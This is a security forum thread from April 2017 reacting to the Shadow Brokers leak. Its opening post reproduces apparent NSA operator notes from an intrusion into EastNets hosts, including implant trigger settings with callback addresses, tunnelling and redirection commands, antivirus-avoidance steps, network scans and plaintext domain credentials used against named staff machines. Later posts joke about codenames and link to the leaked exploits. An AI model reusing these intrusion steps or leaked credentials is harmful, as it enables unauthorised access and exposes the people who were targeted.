Security Fuckup Megathread - v13.69 - plugins may violate privacy

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > YOSPOS > Security Fuckup Megathread - v13.69 - plugins may violate privacy

«‹›216 »

spankmeister: Jun 15, 2008

The target notes are very interesting.

Were they targeting journo's?

7:35 AM 11/7/2012 Run a netmap to find targets of interest
** Want Sanam Mirchandi if possible, otherwise just an additional UR in the 10.10.10.X subnet

Doesn't seem likely, probably a coincidence.

code:

ISP:	LK
City:	
Phone:	
ISP IP:	65.218.69.150
Source IP:	
FINAL target IP:	
Ops Machine:	LOCALHOST.LOCALDOMAIN
Redirecting Method 1:	INCISION
Redirect Host 1:	192.168.1.3
Redirect Target 1:	10.10.10.180


BEGIN UNIX OPNOTES:

Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) : 
---> 202.145.16.4          sunblade.kouku-dai.ac.jp       pitchimpair          unix      successful    
---> 192.168.1.3           endxbmail001.eastnets.com      jeepflea_market      windows   successful    
----> 10.10.10.180         store.eastnets.com             jeepflea_market      windows   successful    
---> 10.10.10.90           endzr-ard.eastnets.com         jeepflea_market      windows   successful    
Ops Machine: WO
Results:

PROJECT=JEEPFLEA_MARKET
OPUSER=57728
OPSCHEDULE=12110110015132
SCRUBVER=6.006000035


======================= P0
--- 202.145.16.4 --- sunblade
=======================
2012-11-07 05:15:23 UTC  ourtn -wBIN -eY5U /current/up/noserver 202.145.16.4 
2012-11-07 05:15:38 UTC  on target
2012-11-07 05:16:00 UTC  Uptime:  37 day(s),  5:45:14
2012-11-07 05:17:04 UTC  logs are clean
2012-11-07 05:17:28 UTC  setting up tunnels
-rawsend 444
-tunnel
r 443 192.168.254.72
r 31219 192.168.254.72

2012-11-07 10:11:55 UTC  tunnels down
2012-11-07 10:12:45 UTC  logs clean
2012-11-07 10:13:12 UTC  of target




LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000035 20121107-0505
###################
SCRUBHANDS v6.006000035 (suite v6.6.0.35 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 12110110015132 -I 57728 -P JEEPFLEA_MARKET -n 198.6.1.3 65.218.69.150/224/129
###################
Final lines of bwmonitor.txt:

Wed Nov  7 10:13:19 UTC 2012
          RX packets:50189 errors:0 dropped:0 overruns:0 frame:0
          RX bytes:39381614 (37.5 MiB)  TX bytes:8780195 (8.3 MiB)

###################################################
Project: JEEPFLEA_MARKET
Date: 5:13 AM 11/7/2012

### Lines to assist in automated processing
# Un-comment the "Op Status" line (the line immediately below this one) to mark this op as unsuccessful
#Op Status: Unsuccessful
# Un-comment the "Non-Standard" line (the line immediately below this one) to mark this op as a non-standard
#Non-Standard: True

###################################################
Targets:



Results:

======================= T1
---   192.168.1.3   --- endxbmail001
=======================

Trigger:  SUCCESSFUL - please update IN NEXT OPPLAN 

           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
		Target Address    : 213.132.40.101
		Source Address    : 202.145.16.4
		Target Protocol   : TCP
		Target Dst Port   : 110
		Target Src Port   : 3054
		TCP Flags         : 0x02
		Keyfile           : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
		Callback Address  : 202.145.16.4
		Callback Dst Port : 443
		Callback Src Port : 0
		Redirect through  : 192.168.254.71:444
		Final Destination : 192.168.1.3
		Id                : 0x0000000100011bd2
		Packet Trailer    : 0x4a11

           ----====**** CORDIALFLIMSY TRIGGER END ****====----

5:21 AM 11/7/2012 trigger sent - no callback
5:28 AM 11/7/2012 retriggered with no CB source port - nope
5:32 AM 11/7/2012 retrigger with the updated PCID
5:35 AM 11/7/2012 CALLBACK RECV
5:35 AM 11/7/2012 WIN2K3 SP 2
5:36 AM 11/7/2012 PSP installed - Kaspersky Endpoint Security 8 for Windows
	| Kaspersky Endpoint Security 8 for Windows                | 8.1.0.831       | Kaspersky Lab              | 2012-08-06   |
	| Kaspersky Security Center Network Agent                  | 9.2.69          | Kaspersky Lab              |              |

5:38 AM 11/7/2012 Uptime: 18 days, 13 hours, 30 minutes, 21 seconds
		  Idle  : 0 days, 0 hours, 4 minutes, 54 seconds


5:39 AM 11/7/2012 Auditing:ON

                     AuditCategorySystem -   Success     Failure
                      AuditCategoryLogon -                      
               AuditCategoryObjectAccess -   Success     Failure
               AuditCategoryPrivilegeUse -   Success     Failure
           AuditCategoryDetailedTracking -                      
               AuditCategoryPolicyChange -   Success     Failure
          AuditCategoryAccountManagement -   Success     Failure
     AuditCategoryDirectoryServiceAccess -   Success     Failure
               AuditCategoryAccountLogon -   Success     Failure


5:41 AM 11/7/2012 logs are clean
	dir -mask * -path * -recursive -max 0 -age 15m

5:53 AM 11/7/2012 NO ZB because of PSP
5:54 AM 11/7/2012 Redirect to target 2  
	monitor packetredirect -listenport 444 
	imr 127.0.0.1 2143 2143

8:38 AM 11/7/2012 logs are clean
8:40 AM 11/7/2012 off target




======================= T2
---  10.10.10.180   --- store
=======================

6:03 AM 11/7/2012 trigger sent - success
           ----====**** CORDIALFLIMSY TRIGGER END ****====----

		Client Version: 2.1.0 (Nov  7 2011 16:44:14)

           ----====**** CORDIALFLIMSY TRIGGER BEGIN ****====----
		Target Address    : 10.10.10.180
		Source Address    : 192.168.1.3
		Target Protocol   : ICMP
		ICMP type,code    : 8,0
		Keyfile           : D:\DSZOPSDisk\Resources\Pc\Keys\jeepflea_market\private_key.bin
		Callback Address  : 192.168.1.3
		Callback Dst Port : 2143
		Callback Src Port : 0
		Redirect through  : 127.0.0.1:444
		Final Destination : 10.10.10.180
		Id                : 0x0000000100010a85
		Packet Trailer    : 0x61ae

           ----====**** CORDIALFLIMSY TRIGGER END ****====----


6:09 AM 11/7/2012 OS:  Win2k3 SP2 32bit 
6:09 AM 11/7/2012 PSP:  Kaspersky Anti-Virus 8.0 for Windows - not comm with cloud
	
	** has been updated
	| Kaspersky Endpoint Security 8 for Windows                    | 8.1.0.831       | Kaspersky Lab              | 2012-08-01   |
	| Kaspersky Security Center Network Agent                      | 9.2.69          | Kaspersky Lab              |              |

	** sad face 
	|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
	|   THIS VERSION APPEARS TO BE UNSUPPORTED.  PLEASE HARASS THOSE RESPONSIBLE.
	|   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


6:10 AM 11/7/2012b Uptime: 85 days, 1 hours, 39 minutes, 32 seconds
		   Idle  : 0 days, 0 hours, 20 minutes, 4 seconds


6:12 AM 11/7/2012 Procs previously seen... not a threat
	- | 2076 |  524 | C:\WINDOWS\system32                                                      | mapsvc.exe          | NT AUTHORITY\SYSTEM          | 2012-06-14 |                                                            |
	- | 2096 |  524 | C:\WINDOWS\system32                                                      | nfssvc.exe          | NT AUTHORITY\SYSTEM          | 2012-06-14 |                                                            |

6:14 AM 11/7/2012 Auditing:ON - not dorked
6:22 AM 11/7/2012 conficker still on target
6:18 AM 11/7/2012 checking logs - we are clean
	dir -mask * -path * -recursive -max 0 -age 15m

6:38 AM 11/7/2012 need to upgrade to FLAV w/KISU and SOLARTIME

1) install PC KISU w/ FLAV
	PCID = 0x100011ee9
	KISU = Installing pc (0x7a43e1fa)

	Version:  2.2.0.5
Kernel Module Loader:  
    Registry Key:    \registry\machine\SYSTEM\CurrentControlSet\Services\QDLTx32\Parameters
    Registry Value:  {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
User Module Loader:  
    Registry Key:    
    Registry Value:  
Module Store Directory:  
    Registry Key:    \registry\machine\SYSTEM\CurrentControlSet\Services\CipcCdp\Parameters
    Registry Value:  {3983D697-20B0-B301-BD80-38DFDA93C8D0}
Launcher:  
    Service Name:    SMBios
    Registry Value:  {57866E4E-885E-C4AC-1AEA-4F8DA7C95D91}
Persistence:  
    Method:  SOTI

Module Id         Size       Order      Flags    Name         Process
=====================================================================
0xbb397f32       62464           0      U  EC    UserModuleLoader 32-Bit  
0xbb397f34          20           0         ECL   Persistence Identifier  
0xd0000102      171520           1  B  D   EC    ntevt       
0xd0000100       87552           1    A U  EC    true        services.exe
    B: BootStart,  S: SystemStart, A: AutoStart,      D: KernelDriver
    U: UserMode,   R: SystemMode,  K: ServiceKey,     E: Encrypted
    C: Compressed, L: DemandLoad,  O: AutoStart Once

7:14 AM 11/7/2012 flav install test ... WOW it worked.
7:21 AM 11/7/2012 we got knocked off the original connection... seems to be ok.
7:26 AM 11/7/2012 psp_avoidance -enable
	- --------------------------------
	- PSP Avoidance changes: SUCCEEDED
	- --------------------------------

7:27 AM 11/7/2012 removing old PC and DMGZ - delete failed needed to pfroadd
	pfroadd c:\windows\System32\wship.dll

7:31 AM 11/7/2012 psp_avoidance -disabled
	- --------------------------------
	- PSP Avoidance changes: SUCCEEDED
	- --------------------------------

7:35 AM 11/7/2012  Run a netmap to find targets of interest
	** Want Sanam Mirchandi if possible, otherwise just an additional UR in the 10.10.10.X subnet

	scansweep -type arp -target 10.10.10.1-10.10.10.254 -period 3s-7s


7:36 AM 11/7/2012 ** TARGETS UP **

       Internet Address         State/Type     Physical Address      Interface
-----------------------------------------------------------------------------------
                   10.10.10.10  Dynamic      00-0C-29-45-41-EB     10.10.10.180
                   10.10.10.49  Dynamic      00-1D-BA-F7-EF-DE     10.10.10.180
                   10.10.10.52  Dynamic      00-16-EA-CA-CD-14     10.10.10.180
                   10.10.10.55  Dynamic      00-26-C6-38-98-30     10.10.10.180
                   10.10.10.56  Dynamic      00-22-FA-98-30-5C     10.10.10.180
                   10.10.10.60  Dynamic      00-1D-72-5D-B5-18     10.10.10.180
                   10.10.10.70  Dynamic      00-13-E8-CB-55-75     10.10.10.180
                   10.10.10.86  Dynamic      00-21-5D-46-D9-3C     10.10.10.180
                   10.10.10.94  Dynamic      E8-39-DF-1B-19-AA     10.10.10.180
                   10.10.10.95  Dynamic      00-16-EA-BB-A2-84     10.10.10.180
                  10.10.10.104  Dynamic      00-1E-65-B2-4C-EA     10.10.10.180
                  10.10.10.124  Dynamic      00-27-13-B3-CA-AA     10.10.10.180
                  10.10.10.134  Dynamic      5C-26-0A-5D-95-83     10.10.10.180
                  10.10.10.147  Dynamic      00-21-5D-45-CE-82     10.10.10.180
                  10.10.10.151  Dynamic      00-21-6A-7F-13-66     10.10.10.180
                  10.10.10.161  Dynamic      5C-26-0A-5D-96-14     10.10.10.180
                  10.10.10.230  Dynamic      00-1F-12-25-AB-05     10.10.10.180



7:37 AM 11/7/2012 scanning up 10.10.10.151 - ragarwal 
	
	NativeOS: Windows 7 Professional 7600
	NativeLanMan: Windows 7 Professional 6.1

7:51 AM 11/7/2012 the old creds failed ....
	dubai-admin dxbr00t
	dubai-admin dxbr00t$$		
	ragarwal ashima2 - local 

	** trying creds updated on 10.10.10.151 - shares = nope


8:00 AM 11/7/2012 scanning 10.10.10.55 - dabbagh

	NativeOS: Windows 7 Enterprise 7601 Service Pack 1
	NativeLanMan: Windows 7 Enterprise 6.1

	** trying creds on 10.10.10.55
		
	creds tried: dubai-admin dxbr00t$$		
	dir \\10.10.10.55\c$\progra~1\Microsoft Forefront UAG\Endpoint Components\3.1.0\
	Windows Defender
	exploit? ** nope ** 

8:08 AM 11/7/2012 scanning up 10.10.10.70 - sanam
		
	NativeOS: Windows 7 Ultimate N 7601 Service Pack 1
	NativeLanMan: Windows 7 Ultimate N 6.1

	shares -target 10.10.10.70 -map IPC$ -credentials dubai-admin dxbr00t$$ EASTNETS	
	dir \\10.10.10.70\c$\progra~1\
	
	Kaspersky Anti-Virus 6.0 for Windows Workstations MP4
	Windows Defender
	exploit? **nope**
	
8:38 AM 11/7/2012 checking the logs... clean
8:39 AM 11/7/2012 off target




======================= T3
---  10.10.10.90   --- ENDXB-ARD
=======================

9:16 AM 11/7/2012 callback recv
9:16 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
		  Idle  : 1 days, 15 hours, 51 minutes, 38 seconds	

9:17 AM 11/7/2012 PSP Kaspersky 6.0 
	| Kaspersky Anti-Virus 6.0 for Windows Workstations     | 6.0.4.1212    | Kaspersky Lab   
	PRODUCT NAME:             Kaspersky Anti-Virus 6.0 for Windows Workstations
        VERSION:                  6.0.4.1212


9:18 AM 11/7/2012 new proc - Adobe Acrobat
	- |  748 |  820 | C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat    | AcroBroker.exe       | EASTNETS\ADesear             | 2012-11-07 |   


9:24 AM 11/7/2012 Uptime: 1 days, 2 hours, 11 minutes, 43 seconds
		  Idle  : 1 days, 15 hours, 51 minutes, 38 seconds
	
9:27 AM 11/7/2012 did not dork auditing
9:41 AM 11/7/2012 Memory Load       : 68%%
9:45 AM 11/7/2012 firewall Status:  Disabled
10:09 AM 11/7/2012 downloaded tasking (~20MB)
10:09 AM 11/7/2012 off target





####
# Lines to assist in techsums
# NOTEs and ERRORs will automatically generate a techsum
# You can also enclose any portion of your opnotes in a <TECHSUM> </TECHSUM> block to have that section be included in the
#   techsum automatically.  Like so:
# <TECHSUM>
# Bad things happened.
# Then more bad things happened.
# Then it _really_ got bad.
# </TECHSUM>
#  Please keep the <TECHSUM> and </TECHSUM> on separate lines
#  Um...also, those angle brackets (< and >) are actually there, unlike the formats below
####

###################################################
#
# Create lines like the following (without #) to create targetnotes files
# Targetnotes files are found in the <target IP> directory as targetnotes.txt; you can also create them directly.
# They will be read to automate actions in future ops.
#
# General note to operators
#NOTE (<target IP>): <here is my note>
#
# Do not run this command (it will cause problems on this box)
#DONOTRUN (<target IP>): <command>
#
# This command caused an error (bring it to the attention of the developer)
#ERROR (<target IP>): <command> <optional: what happened>
#
# This process runs all the time and is harmless
#IGNORE (<target IP>): <executable name>
#
# This process was identified
#ID: <process>=<label>

spankmeister fucked around with this message at 14:01 on Apr 14, 2017

# ? Apr 14, 2017 13:53

Adbot: ADBOT LOVES YOU

# ? May 17, 2024 04:02

spankmeister: Jun 15, 2008

Some good stuff in here :discourse:

# ? Apr 14, 2017 14:03

Loving Africa Chaps: Dec 3, 2007; We had not left it yet, but when I would wake in the night, I would lie, listening, homesick for it already.

Seems they were wanting to track all dat terrorist cash

# ? Apr 14, 2017 14:17

Pikavangelist: Nov 9, 2016; There is no God but Arceus
And Pikachu is His prophet

so does the NSA pick their codenames by randomly mashing together words or something?

it's like one of those stupid facebook memes: to discover the name of the NSA operation that's spying on you, pick an adjective from this list based on the day you were born and a noun from this list based on the first letter of your last name

# ? Apr 14, 2017 15:23

Shame Boy: Mar 2, 2010

Pikavangelist posted:

so does the NSA pick their codenames by randomly mashing together words or something?

it's like one of those stupid facebook memes: to discover the name of the NSA operation that's spying on you, pick an adjective from this list based on the day you were born and a noun from this list based on the first letter of your last name

actually yes, because in WWII the british were able to figure out details of a top secret german radio guidance system because it was named "cyclops" so they figured it must use only one radio beam unlike their previous ones. ever since then everyone picks codenames randomly

# ? Apr 14, 2017 15:25

fins: May 31, 2011; Floss Finder

from Zippybeer-1.0.2.py

code:


__logo__ = '''
                           .sssssssss.
                      .ssssssssssssssssss
                    sssssssssssssssssssssss
                   sssssssssssssssssssssssssss
                    @@sssssssssssssssssssssss@ss
                    |s@@@@sssssssssssssss@@@@s|s
               _____|sssss@@@@@sssss@@@@@sssss|s
             /       sssssssss@sssss@sssssssss|s
            /  .----+.ssssssss@sssss@ssssssss.|
           /  /     |...sssssss@sss@sssssss...|
          |  |      |.......sss@sss@ssss......|
          |  |      |..........s@ss@sss.......|
          |  |      |...........@ss@..........|
           \  \     |............ss@..........|
            \  ,    +...........ss@...........|
             \______ .........................|
                    | ........................|
                   /...........................\\
                  |.............................|
                     |.......................|
                         |...............|

'''

# ? Apr 14, 2017 15:27

ymgve: Jan 2, 2004; Offensive Clock

ohgodwhat posted:

JFC they cost tens of thousands of dollars, and seemingly having them run all day is a feature? It's like loving audiophile poo poo for cooking

Edit: sorry, the great thing about the new model is that you can turn it off! Unlike normal stoves I guess? https://youtu.be/wZiNxafBZ9o

i'm totally shocked that a range created by a gas company is using lots of gas

# ? Apr 14, 2017 15:37

Rufus Ping: Dec 27, 2006; I'm a Friend of Rodney Nano

ate all the Oreos posted:

actually yes,

not always
1) related programmes sometimes have related names
2) programme names sometimes hint at their purpose e.g. COTRAVELLER

# ? Apr 14, 2017 15:39

FlapYoJacks: Feb 12, 2009

Pikavangelist posted:

so does the NSA pick their codenames by randomly mashing together words or something?

it's like one of those stupid facebook memes: to discover the name of the NSA operation that's spying on you, pick an adjective from this list based on the day you were born and a noun from this list based on the first letter of your last name

I got moon moon.

# ? Apr 14, 2017 15:38

Wiggly Wayne DDS: Sep 11, 2010

Rufus Ping posted:

not always
1) related programmes sometimes have related names
2) programme names sometimes hint at their purpose e.g. COTRAVELLER

yeah ideally they shouldn't but nsa really seems to be sloppy on their codenames (probably a difference between their internal vs external codenames)

so many interesting exploits in this dump though, i wouldn't look into it targeting up to win 8 given the dates involved - there's a lot of smb/rdp exploits in here. then there's nsa's metasploit variant being thrown into the wild

peruse without downloadiing: https://github.com/DonnchaC/shadowbrokers-exploits

# ? Apr 14, 2017 15:43

theflyingexecutive: Apr 22, 2007

ate all the Oreos posted:

actually yes, because in WWII the british were able to figure out details of a top secret german radio guidance system because it was named "cyclops" so they figured it must use only one radio beam unlike their previous ones. ever since then everyone picks codenames randomly

ummmm you're forgetting operation torpedo, too good to pass up

# ? Apr 14, 2017 15:52

Shame Boy: Mar 2, 2010

Rufus Ping posted:

not always
1) related programmes sometimes have related names
2) programme names sometimes hint at their purpose e.g. COTRAVELLER

huh i thought all the secret-y ones had to have random names but you could name public ones however you want (hence OPERATION ENDURING FREEDOM :911:

and stuff like that) ok

# ? Apr 14, 2017 15:56

Lysidas: Jul 26, 2002; John Diefenbaker is a madman who thinks he's John Diefenbaker.; Pillbug

ate all the Oreos posted:

actually yes, because in WWII the british were able to figure out details of a top secret german radio guidance system because it was named "cyclops" so they figured it must use only one radio beam unlike their previous ones. ever since then everyone picks codenames randomly

oh come on it was "wotan" (german for "odin")

# ? Apr 14, 2017 16:02

Shame Boy: Mar 2, 2010

Lysidas posted:

oh come on it was "wotan" (german for "odin")

yeah you're right, what the hell was i thinking of i know for sure i read about something named "Zyklop" and i guess mixed it with this in my memory :psyduck:

e: at least while looking it up I found an article on something called the "Butt Report" :laugh:

# ? Apr 14, 2017 16:13

Wiggly Wayne DDS: Sep 11, 2010

trendmicro fun: https://conference.hitb.org/hitbsec...20Of%20Them.pdf

# ? Apr 14, 2017 16:41

crazysim: May 23, 2004; I AM SOOOOO GAY

theflyingexecutive posted:

ummmm you're forgetting operation torpedo, too good to pass up

the chances of a group of organized pedos finding out the code name were very low compared to an adversarial state actor.

# ? Apr 14, 2017 16:53

hobbesmaster: Jan 28, 2008

atomicthumbs posted:

for sprint or verizon, sure

this is GSM

right so its supposed to pass ptcrb to be let onto the networks and FCC to be imported

I don't see anything on the module about that

# ? Apr 14, 2017 16:57

Wiggly Wayne DDS: Sep 11, 2010

turns out the leaks were fabricated

https://twitter.com/EastNets/status/852912656130244608

# ? Apr 14, 2017 17:10

Subjunctive: Sep 12, 2006; ✨sparkle and shine✨

well that's a relief

# ? Apr 14, 2017 17:12

Progressive JPEG: Feb 19, 2003

vOv posted:

if you live somewhere cold then it'll probably offset your heating bill at least

Electric heating is expensive, if you live somewhere cold you're hopefully using heating oil, natural gas, or propane

e: nm thought those things were electric, looks like they're not

Progressive JPEG fucked around with this message at 17:21 on Apr 14, 2017

# ? Apr 14, 2017 17:17

anthonypants: May 6, 2007; by Nyc_Tattoo; Dinosaur Gum

Wiggly Wayne DDS posted:

turns out the leaks were fabricated

https://twitter.com/EastNets/status/852912656130244608

whew!

# ? Apr 14, 2017 17:20

goddamnedtwisto: Dec 31, 2004; If you ask me about the mole people in the London Underground, I WILL be forced to kill you; Fun Shoe

Progressive JPEG posted:

Electric heating is expensive, if you live somewhere cold you're hopefully using heating oil, natural gas, or propane

e: nm thought those things were electric, looks like they're not

nope, they do gas ones but you get looked down on if you don't use a coal- or wood-burner.

# ? Apr 14, 2017 17:24

Progressive JPEG: Feb 19, 2003

I hope building codes require the chimney to go right to the bedroom in those cases

# ? Apr 14, 2017 17:30

Lutha Mahtin: Oct 10, 2010; Your brokebrain sin is absolved...go and shitpost no more!

Progressive JPEG posted:

Electric heating is expensive, if you live somewhere cold you're hopefully using heating oil, natural gas, or propane

there are off-peak electric systems that aren't expensive and are suitable for cold climates

# ? Apr 14, 2017 17:33

vodkat: Jun 30, 2012; cannot legally be sold as vodka

Diva Cupcake posted:

the sec fuckup has been found.

https://twitter.com/musalbas/status/852860956396986370

bit disingenuous to call them an anti-money laundering company, compliance checking just means you have enough money to pay someone to make it all legal and above board, especially when they are based in Dubai, a city known for its ethical and upstanding legal system.

Also, have a poop touching secfuck from reddit:

quote:

[gamedev]App developer asks why he's not getting much ad revenue, commenters suggest an unexpected source of money.

quote:

Lmao
When your game is so bad you can make money by reporting the exploit to Google

quote:

EDIT FOR ANYONE WANTING TO LOOK INTO THESE APPS: DO NOT DOWNLOAD MINE COLONY, A REDDITOR ALREADY HAD TO FACTORY RESET HIS PHONE DUE TO PROBLEMS CAUSED BY IT

lol

https://np.reddit.com/r/gamedev/comments/6575nr/is_it_actually_possible_to_earn_money_from_mobile/dg8mmia/?context=10000

# ? Apr 14, 2017 17:34

Volmarias: Dec 31, 2002; EMAIL... THE INTERNET... SEARCH ENGINES...

spankmeister posted:

Some good stuff in here

Am I the ZESTYLEAK

vodkat posted:

https://np.reddit.com/r/gamedev/comments/6575nr/is_it_actually_possible_to_earn_money_from_mobile/dg8mmia/?context=10000

Or am I the redditor's phone's micro SD card that gave out at the wrong time

# ? Apr 14, 2017 17:56

Jewel: May 2, 2009

I, uh, uh oh?

https://twitter.com/hackerfantastic/status/852926927514083328

https://twitter.com/Snowden/status/852949485726699520

# ? Apr 14, 2017 19:25

cinci zoo sniper: Mar 15, 2013

Jewel posted:

I, uh, uh oh?

https://twitter.com/hackerfantastic/status/852926927514083328

https://twitter.com/Snowden/status/852949485726699520

ehhhhhhhhhhhh

# ? Apr 14, 2017 19:26

fishmech: Jul 16, 2006; by VideoGames; Salad Prong

ate all the Oreos posted:

huh i thought all the secret-y ones had to have random names but you could name public ones however you want (hence OPERATION ENDURING FREEDOM and stuff like that) ok

but if most of your secret projects have random code names, then you can fake people out who might find the names by having some of your related projects have related names.

because if people know that every related name is always an unrelated project, that tells them something. like how the enigma machine couldn't scramble the same letter to itself, so if you saw an E you knew it couldn't actually be an E and so on.

# ? Apr 14, 2017 19:34

30 TO 50 FERAL HOG: Mar 2, 2005

Jewel posted:

I, uh, uh oh?

https://twitter.com/hackerfantastic/status/852926927514083328

https://twitter.com/Snowden/status/852949485726699520

just server 2008 though, so basically anyone who gets hit by this deserves it

# ? Apr 14, 2017 19:46

Diva Cupcake: Aug 15, 2005

im the enterprise that only runs 32-bit operating systems

# ? Apr 14, 2017 19:47

cinci zoo sniper: Mar 15, 2013

Diva Cupcake posted:

im the enterprise that only runs 32-bit operating systems

pleasure to meet you, bank of america

# ? Apr 14, 2017 19:50

Shame Boy: Mar 2, 2010

does anyone have an actual article to link to and not a random tweetguy with a fuckin' rainbow dash avatar

e: I assume it's just this? https://arstechnica.com/security/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/

# ? Apr 14, 2017 19:51

Wiggly Wayne DDS: Sep 11, 2010

BiohazrD posted:

just server 2008 though, so basically anyone who gets hit by this deserves it

the exploits only care about targets up to 2013 as that's where the compromised kit comes from, no reason that these exploits can't affect newer platforms

# ? Apr 14, 2017 19:51

cinci zoo sniper: Mar 15, 2013

ate all the Oreos posted:

does anyone have an actual article to link to and not a random tweetguy with a fuckin' rainbow dash avatar

but le snowden has retweeted it!!

basically the windows stuff from today's shadowbroker dump, check last thread page or so

# ? Apr 14, 2017 19:52

Shame Boy: Mar 2, 2010

cinci zoo sniper posted:

but le snowden has retweeted it!!

basically the windows stuff from today's shadowbroker dump, check last thread page or so

yeah ok i thought it had to do with that but wasn't sure, thanks

# ? Apr 14, 2017 19:54

pr0zac: Jan 18, 2004; ~*lukecagefan69*~; Pillbug

ate all the Oreos posted:

a random tweetguy with a fuckin' rainbow dash avatar

this is unfortunately the current state of infosec news

# ? Apr 14, 2017 20:15

anthonypants: May 6, 2007; by Nyc_Tattoo; Dinosaur Gum

it's good that they released this after patch tuesday, because if they'd released it a week ago everyone would be extremely upset at microsoft for not including patches for these 0-days

# ? Apr 14, 2017 20:19

Thanks Ants: May 21, 2004; #essereFerrari

welp

https://twitter.com/DEYCrypt/status/852974162138337280

# ? Apr 14, 2017 21:24

Adbot: ADBOT LOVES YOU

# ? May 17, 2024 04:02

FAT32 SHAMER: Aug 16, 2012

oh man work is going to be so much fun on monday

# ? Apr 14, 2017 21:40

The Something Awful Forums > Discussion > Serious Hardware/Software Crap > YOSPOS > Security Fuckup Megathread - v13.69 - plugins may violate privacy

«‹›216 »